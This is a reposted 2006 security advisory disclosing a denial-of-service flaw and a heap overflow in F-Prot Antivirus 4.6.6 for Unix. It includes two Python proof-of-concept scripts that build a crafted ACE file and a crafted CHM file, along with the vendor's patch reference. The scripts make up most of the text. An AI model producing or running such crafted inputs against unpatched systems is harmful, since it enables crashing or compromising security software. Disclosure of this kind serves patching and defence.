Home / exploitsPDF  

fprot-dos.txt

Posted on 06 December 2006

Name: F-Prot Antivirus for Unix: heap overflow and Denial of Service Vendor: http://www.f-prot.com Release date: 4 Dec, 2006 URL: http://gleg.net/fprot.txt Author: Evgeny Legerov <research@gleg.net> I. DESCRIPTION Two vulnerabilities in F-Prot Antivirus 4.6.6 for Unix platforms could allow a remote attacker to cause a DoS or execute an arbitrary code. II. DETAILS 1. ACE file Denial of Service When parsing a specially crafted ACE compressed file F-Prot Antivirus will enter in an infinite loop. See fprot1.py for more details. 2. CHM file heap overflow When parsing a specially crafted CHM file a heap overflow will occur in F-Prot Antivirus. See fprot2.py for more details. III. VENDOR RESPONSE Update to F-Prot 4.6.7: http://www.f-prot.com/news/gen_news/061201_release_unix467.html IV. EXPLOITS # fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS # # Copyright (c) 2006 Evgeny Legerov # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. # # To test this code on Linux: # # create ACE compressed file # $ ./fprot1.py > 1.ace # $ f-prot 1.ace import sys import struct ACE=""" 58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14 02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a 55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52 53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff 00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00 02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41 41 41 41 41 41 """ s = "" for i in [chr(int(i, 16)) for i in ACE.split(" ") if len(i.strip()) > 0]: s += i sys.stdout.write(s) # fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap # overflow # # Copyright (c) 2006 Evgeny Legerov # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. # # $ ./fprot2.py > 1.chm # $ f-prot 1.chm import sys import struct s="" s+="ITSF" # signature s+=struct.pack("<L",3) # version s+=struct.pack("<L",96) # header_len s+=struct.pack("<L",1) # unknown s+=struct.pack("<L",0x41424344) # last_modified s+=struct.pack("<L",0x419) # lang_id s+="A"*16 #dir_clsid s+="B"*16 #stream_clsid s+=struct.pack("<L",96) + "x00" * 4 #sec0_offset s+=struct.pack("<L",24) + "x00" * 4 #sec0_len s+=struct.pack("<L",120) + "x00" *4 #dir_offset s+=struct.pack("<L",4180) + "x00" * 4 #dir_len s+=struct.pack("<L",4300) + "x00"*4 #data_offset s+="A"*24 s+="ITSP" s+=struct.pack("<L", 1) # version s+=struct.pack("<L",0x54) # header_len s+=struct.pack("<L", 0xa) # unknown s+=struct.pack("<L",1000) # block_len - BUG? s+=struct.pack("<L",2) # blockidx s+=struct.pack("<L", 1) # index_depth s+=struct.pack("<L", -1) # index_root s+=struct.pack("<L",0) # index_head s+=struct.pack("<L",0) # index_tail s+=struct.pack("<L", -1) # unknown2 s+=struct.pack("<L",1) # num_blocks s+=struct.pack("<L", 1033) # lang_id s+="A"*32 s+="B"*10000 sys.stdout.write(s) V. CREDIT Discovered by Evgeny Legerov. The vulnerabilities are part of VulnDisco Pack for CANVAS since Sep, 2006.

 

TOP